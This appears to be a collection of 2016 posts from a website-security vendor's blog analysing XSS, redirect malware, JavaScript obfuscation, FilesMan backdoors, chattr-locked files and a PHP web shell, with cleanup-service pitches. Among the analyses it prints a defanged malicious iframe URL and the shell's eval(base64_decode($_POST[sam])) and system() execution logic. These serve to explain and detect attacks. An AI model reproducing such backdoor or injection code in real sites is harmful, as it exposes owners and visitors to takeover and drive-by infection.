Wednesday, June 1, 2016

XSS - Cross Site Scripting Malware





What is Cross Site Scripting (XSS)?

May 26th 2016 jetpack disclosed a XSS vulnerability discovered in their popular plugin.
We would to take this opportunity and describe what is XSS.

Cross Site Scripting or XSS attack refers to injection of the malicious code or malicious payload into pages of legitimate website. Further, when these compromised pages are visited by website users, the injected malicious code (or payload) is executed by client-side application (visitor's web browser) and performs the actual malicious action such as: redirecting visitor to another website, download and installation of malicious code, showing adult ads and etc...

In most cases, malicious code injection does not require direct access to web site files or internals. It, basically, utilizes and exploits certain kind of security vulnerability when website or web application stores and further present invalidated user input. Such unfiltered forms, pop-ups and other dynamic content is where malicious code or payload could be specially crafted into string serving JavaScript code or a link/ Iframe to another compromised website.

XSS vulnerabilities could be very trivial and be detected by XSS vulnerability scanner. However, in its complex variants it may take several years until it gets uncovered (like with Jetpack plugin where XSS vulnerability remained undetected since 2012).


XSS example

Following example show basic XSS vulnerability.

Take a look at the following web page:




If comment variable will contain pure text then user's comment will be presented as required. But if the input has something like:



Then. instead of presenting text of the comment, web browser will handle Iframe tag and download content of the Iframe's URL
which is http[://]thirdparty-site[.]xyz/drive-by-download-attack-page.php

This kind of attack known as DOM-based XSS. The same result could be achieved directly on server side during page/HTML generation .

Following PHP code depicts such kind of vulnerability:



If get_user_last_comment_from_database() call will return the same string as in previous example,
instead of presenting comment, this page will download malicious code from http[://]thirdparty-site[.]xyz/drive-by-download-attack-page.php

How to prevent XSS attacks?

The XSS vulnerable web applications are an easy target and it is just a matter of time until they'll be exploited by hackers. Hence, first step is to verify that your website is not vulnerable. If you use third party software modules, make sure proper input filtering is implemented. If you develop your own website, verify every piece of user input.

We think this is a good check-list for developers: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

How to detect XSS infection on your website?

Here at Quttera, we deal with XSS and other malware on a daily basis. If you need our help in identifying and removing the infection from your site we are here to help.

ThreatSing! Website Antimalware scans and verifies every link on scanned web page. Comprehensive report notifies website owners about detected malicious & blacklisted links.

Monday, May 30, 2016

SQLMAP.py - A friend or a foe


Security tools serving good and bad 

This is a python script used by Cyber Security Analysts to check for vulnerabilities in website. Like any other network security tool, it is being utilized by many, meaning it was also being utilized by the bad guys a.k.a "hackers". While we were browsing the dark web, we stumbled upon a hacking forum where you need to take an exam before you could join their group. Now, this forum is no new to us as there were a lot of hacking forum scattered over the net. What intrigued us most is their entrance exam. In order for a newcomer to become a member they must need to prove themselves by taking over or defacing ones site.

SQLMAP.py has been used in the forum wildly like this is the default tool to check for anyone's site. The administrator of the forum posts a list of sites that are going to be brutally attacked by the newcomers with the use of this tool. Majority of the sites are using CMS such as WordPress, Joomla, Magento, etc., CMS are, usually, not vulnerable by themselves, they just need to be updated with newest release. Meaning, all outdated sites are very prone to attacks.

Remediation

This is just an opening attack for a newbie hackers, so most likely if we were able to deny them, they will stop in an instant. So what we can do to prevent this? It is always healthy to check your access logs from time to time to check for any malicious or brute force access on your site, If you found one, try to investigate where it was coming from, but if you do not recognize them, you can always block their IP from accessing your site. If you are a developer or you have your own developer you can also put a lexical checker on your site. Thus verifying SQL commands to filter SQL commands sent to your site.

For more information on how to use the tool, please visit the sqlmap.py site @ www.sqlmap.org 

Malware clean-up

If you suspect that your website was infected with malware, Quttera experts are always happy to clean it for you and help to prevent it - Malware Monitoring & Cleanup Plans For Websites

Thursday, April 21, 2016

Traffic Redirection Malware On Website

Traffic Distribution System (TDS) On Infected Websites

This malware technique is widely used to monitor and redirect traffic from compromised website to malicious content or paid referrals. In past, we highlighted similar cases in our blog: Blacklisted website used to drive traffic to 'penny stock website'

Malicious TDS flow


Background

ThreatSign! client received complaint from his customer that his website got blocked when accessed from Google Chrome. 

Malware details

Upon internal malware scan the infection was identified inside WordPress theme. Obfuscated malicious code generated hidden iframe redirecting visitors to TDS from where they got landed on 3d party pages depending on location, web browser type and other parameters. In some cases, user gets redirected to fake Adobe player download page.

Obfuscated Malicious JavaScript Code

Decoded Malicious Iframe


Detection rate

Malware clean-up

Search for similar code inside your WordPress theme. If you suspect that your website was infected by this or similar malware please select from our Website Anti-malware Monitoring plans and our experts will be happy to clean it up for you.

Tuesday, April 19, 2016

RedKit Malware Still Alive

RedKit Malware Still Alive

RedKit as detected by Online Malware Scanner


Background

Back in 2013, we posted about RedKit infecting significant number of websites. It appears that, three years later, the statistics of the websites submitted to online malware scanner show the revive of this malware among infected websites. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Malware entry

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=hxxp://brg-catalogues[.]com/mzcf.html?j=1886263>

The URL in src of the iframe hosts another ~15 similar HTML pages (mzcf.html) leading to drive-by-download attack. Both domains are not flagged by Google, meaning that they have not yet been blacklisted:




Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware, Quttera experts are always happy to clean it for you - Malware Monitoring & Cleanup Plans For Websites




Tuesday, April 12, 2016

Malicious JavaScript Popup On WordPress Websites

Malicious JavaScript Popup On WordPress Websites


This infection pulled out from the malicious websites list submitted by users to our free Online Website Malware Scanner. If your website visitors complain that they experience the same when they access your website, then probably you were hit by the same malware.

Note: since the scan was completely outside-in (HTTP-based) we're not posting here the PHP portion of the malware. 

Malicious Redirect

When this infection loads, your website visitor gets presented with the "Checking your browser" window (see below screenshot). A "Continue" button is there, asking for the user-action in order to complete this stage of the attack. When user clicks this button, it generates random URL that points to another page located on the same server. The URL will have the prefix ?pagerd_

e.g. www.infected-domain.com/?pagerd_dclw7h

Malicious JavaScript Popup

When investigating further and following such generated link, we got the following PHP errors:


Pointing out the malware in infected footer.php file of the installed WordPress theme. 

Summary

Above info shows the path to detect and remove the discussed malware. In order to stay safe and avoid future infection it is essential to keep all passwords safe, WordPress files up to date and of course use only trusted and constantly updated/fixed plugins and themes.

If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.


Friday, April 8, 2016

jquery min php massive malware infection

Jquery.min.php Massive Infection Of WordPress And Joomla Websites


Background

During malware cleanup from our clients websites, same infection was noticed again and again. Additionally, when reviewing latest malicious scan reports in our Online Website Malware Scanner it could be seen that almost every third website is infected with this "disguised jquery" injection. To see this, just look at latest submissions by visitors (last 2-3 hours) and click View Code link in the Threat Dump section of the report.



Hence this short post is to help you identify this malware on your website and avoid getting blacklisted.

Malicious Payload

Being injected before the <head> tags on both WordPress and Joomla platform, this malicious script generates links to malware components on 3D party infected websites. This is common technique to break the malicious code into portions and host each one on different websites in malicious chain allows to replace the code origin each time, e.g. based on clock.

jquery.min.php malware script




How to prevent the (re) infection

Everyday, attackers find new ways to hide Backdoors so it is safe to follow there rules to improve your protection:

  1. Backup your site
  2. Keep your CMS version up to date.
  3. Change you passwords periodically. Most hackers try to brute force the credentials.
  4. Change Table Prefix of database. This will avoid SQL injections.
  5. Add additional security by modifying .htaccess.
  6. In case of WordPress it is recommended to run periodically both internal and external scans with our plugin.
  7. Always keep plugins and themes updated to latest version.
If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.












Thursday, April 7, 2016

Bypassing Antivirus Detection With JavaScript Obfuscation


JavaScript Code Obfuscation Or How To Bypass Antivirus Detection


A one liner definition of obfuscation from Wikipedia:
In software development, obfuscation is the deliberate act of creating obfuscated code, i.e. source or machine code that is difficult for humans to understand.
Obfuscated JavaScript code is a widely used technique to hide initial functionality of a given script. There is nothing malicious in obfuscation itself. Its valid use can be to protect intellectual property of a developer or a company implemented given script or library; to compress code; to decrease size of downloaded web page; and etc.

Due to its popularity there are plenty of free online obfuscators that easily translate simple JavaScript code to something unreadable and mostly impossible for human understanding.

Let's run a simple example:

We have a simple JavaScript snippet. All that it does is showing the message window with string "Obfuscated string"
We can have something like this:
  1. var a="Obfuscated string";
  2. function msg(m){alert(m);}
  3. msg(a);
Passing this script through freely available online obfuscators http://javascriptobfuscator.com/ and http://javascriptcompressor.com/ gives us two completely different outputs:
var _0x86eb=["\x4F\x62\x66\x75\x73\x63\x61\x74\x65\x64\x20\x73\x74\x72\x69\x6E\x67"]; var a=_0x86eb[0];function msg(_0x988dx3){alert(_0x988dx3);} ;msg(a);
and
eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 0="4 5";6 1(2){7(2)}1(0);',8,8,'a|msg|m|var|Obfuscated|string|function|alert'.split('|'),0,{}))
Not we can go further and pass the output of the first obfuscator through the second one which will give us result even more far different from the original script:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1 4=["\\9\\c\\i\\k\\2\\7\\8\\3\\b\\l\\d\\2\\3\\e\\f\\g\\h"];1 a=4[0];j 5(a){6(a)};5(a);',22,22,'|var|x73|x74|_0x86eb|msg|alert|x63|x61|x4F||x65|x62|x20|x72|x69|x6E|x67|x66|function|x75|x64'.split('|'),0,{}))
This far, without any special skills required, we have converted original source code to something completely not related and "unreadable". Our intellectual property is safe and unless, of course, a group of hackers will spent time dedicated to de-obfuscation (there are no 100% proof targets as history shows).

Hiding malicious code in the web

Unfortunately, JavaScript obfuscation is used not only for legal and legitimate purposes. Almost every exploit kit (for example http://en.wikipedia.org/wiki/Blackhole_exploit_kitutilizes JavaScript obfuscation algorithms in order bypass antivirus protection and invisibly inject malware into victim PC or touch devices.

Worth mentioning website malware cases are being collected with public online Website Malware Scanner. Some cases of execution flow of JavaScript threats:
Looking at the analysis we can see that the target of all these threats is to inject hidden iframe, which finally redirects visitors browser to malware distribution server. Successful attack results in silently installed malware on PC or touch devices that were used to visit infected web site.

So why JavaScript obfuscation bypass antivirus detection?

Fairly, there are few integral parts playing a major role in this puzzle. First of all JavaScript itself is simple and very rich language that provides possibility for dynamic generation and execution of script code using eval and unescape methodsThis fact backed with all modern obfuscation techniques make it simply impossible to detect such payload using pattern-based engines utilized by antiviruses.
Antiviruses are still an essential part of the secure perimeter as they capable to prevent accessing links to known infected web servers that distribute malware. Obviously, the remaining issue here is that thousands of new web servers hacked and compromised day by day while it take some amount of time until such web servers get listed in antivirus blacklist.

If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.

Friday, April 1, 2016

FilesMan Backdoor Malware On Your Computer

FilesMan is being abused in the wild

What is FilesMan? It is a File Manager used to explore the files in a computer. It is the most basic malware tool that attackers upload to your website as a form of backdoor to browse your files. Some of these File Managers are sophisticated and has their own GUI (Graphical User Interface), some are capable of uploading and downloading files from your website as if the attackers were in front of your computer browsing it personally.

Do I have this malware on my website?

So how do you spot if your website has it? A string search for "FilesMan" would actually do the trick. However, most of the attackers use heavy obfuscation so that you can't detect it by simple string searching. You may also want to look for split strings. This technique is also widely used to outsmart string searching by site owners.

This is an example of an ordinary FilesMan that can be searched throughout your system:
FilesMan backdoor malware

While this one has been concatenated and can still be searched by using regular expression:
FilesMan obfuscated with string split applied.


Other well known File Managers that are being abused in the wild has GUI and can be found mostly anywhere on the internet:

C99 Madshell:
C99 Madshell


b374k-shell:
b374k


How to prevent the infection

Everyday, attackers find new ways to hide backdoors so it is safe to follow there rules to improve your protection:
  1. Backup your site.
  2. Keep your CMS version up to date.
  3. Change you passwords periodically. Most hackers try to brute force the credentials.
  4. Change Table Prefix of database. This will avoid SQL injections.
  5. Add additional security by modifying .htaccess.
  6. In case of WordPress it is recommended to run periodically both internal and external scans with our plugin.
  7. Always keep plugins and themes updated to latest version.

Still got infected and/or blacklisted?

No worries. There are no bulletproof websites. Here at Quttera we're cleaning this and other kinds of malware on a daily basis. If you'd like our malware analysts to help you, just select appropriate ThreatSign! anti-malware plan and get back online.

For other issues and help: Quttera's help-desk

Wednesday, March 2, 2016

Malware Targeted Zend Security Framework





Background


Re-directions are being commonly and wildly abused nowadays. Here at Quttera, we're dealing with them on a daily basis when cleaning ThreatSign! customers websites and servers. However, this particular one really got our attention since it cannot be seen with "unarmed eye" and it resides in one of the many plugins of the site.

The behavior of the redirection exploits the API being used by the site. The malware hooks the API being called, intercepts the parameter and replaces it with its own code for execution back to the original site.


Malware Analysis

When we debugged the site:






stepping inside the API to locate the function. The file below is nowhere to be found:




HTML variable will be the "storage" of the first redirection. When executed, it will be redirected again to another download site:




Checking common sources that could lead to re-directions such as htaccess, wp_redirects and etc... didn't give any results.

Detection and Malware Details

After in-depth analysis and signature searching, we found out that it hides in one of the installed plugins on the site. Due to the huge number of plugins that the site was using, It took us a bit of a time to trace where it leads and VOILA! Behold of the code below. Remember the screenshots above? The code is a match!





There were also a handful of functions in this specific module, like:
  1. Check for ZEND Security Upgrade Version
  2. API Response Handling
  3. Redirection Settings
  4. Content Generator

If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.



Sunday, February 14, 2016

How Hackers Prevent Linux Malware From Being Removed

Malware On Linux

Background

Here at Quttera, we clean infected websites on a daily basis and this weekend our automated cure procedure failed to remove malicious files. The customer actually had more than 170 websites on the Linux server which was heavily infected. The automatic cure is executed with root permissions so we started investigating what was this all about.

Investigation 

We logged-in into the infected server and executed few commands with root user such as 


and we got a "Permission denied".




At the beginning we thought that there is an issue with a parent directory permissions but after a quick verification we confirmed that the permissions were OK.

The next step was looking for a running process prevents a file removal, however the lsof output did not confirm this.

It is not a surprise that hackers are constantly changing tactics and improving techniques. This allows them to:

  1. Keep an infection undetected on a compromised server or website as much as possible. 
  2. Make it harder to cleaned/remove it. 

And one of the main challenges is staying on top of those threats as they evolve.

We continued with further investigation and the next step was to use lsattr command which lists file attributes on a Linux second extended file system. We executed the lsattr command on the locked file and the file had "a" and "i" attributes.

You can always search for the lsattr command description through 'man' in Linux. So, we came across chattr command that led us to the following:

  1. chattr change file attributes on a Linux second extended file system
  2. File with the "i" attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file and no data can be written to it. Only a super-user or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear the attribute.
  3. File with the "a" attribute set can be opened in append mode only for writing. Only the super-user or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear the attribute.

So to make the long story short, the solution was to run:


and




which allowed to remove file without any problem



What is "Linux second extended file system"?

The second extended file system (or Ext2) is Ext4 file system grandparent used by Linux kernel.
The Ext2 used as default file system by several Linux distributions and it was replaced by Ext3.
You can find more information about the Ext2 here

If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.









Saturday, January 30, 2016

New Generic PHP Shell Malware In The Wild

New Generic PHP Shell Malware In The Wild

Shell body

Background

Massive infection in the form of new generic PHP shell has been, recently, detected by Quttera malware researchers. We are still investigating all the incidents to find out the exact infection vector. Here is what we know so far:
  1. In most cases this shell was uploaded as wp-update.php to WordPress root directory
  2. On almost all sites, where we detected this shell all JavaScript files were infected by malicious JavaScript code injecting reference to malicious IFRAMEs
  3. This is generic shell script and it executes content that is provided in $_POST argument calls "sam"

How this shell works

  1. Firstly it resets last time when it was accessed using @touch function
  2. Then it checks if "eval" function is available via execution of the following command: $l = eval("return true")
  3. After that, it decides how to execute encoded script provided inside $_POST[sam] variable
  4. If eval function is available, then infection is delivered using following expression: eval(base64_decode($_POST[sam]))
  5. If eval command is not available, then shell dumps provided execution script into temporary file _ptemp and executes it using "system" command: system("php _ptemp;rm _ptemp");
  6. The injected infection body depends on input provided in $_POST[sam] variable.
If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.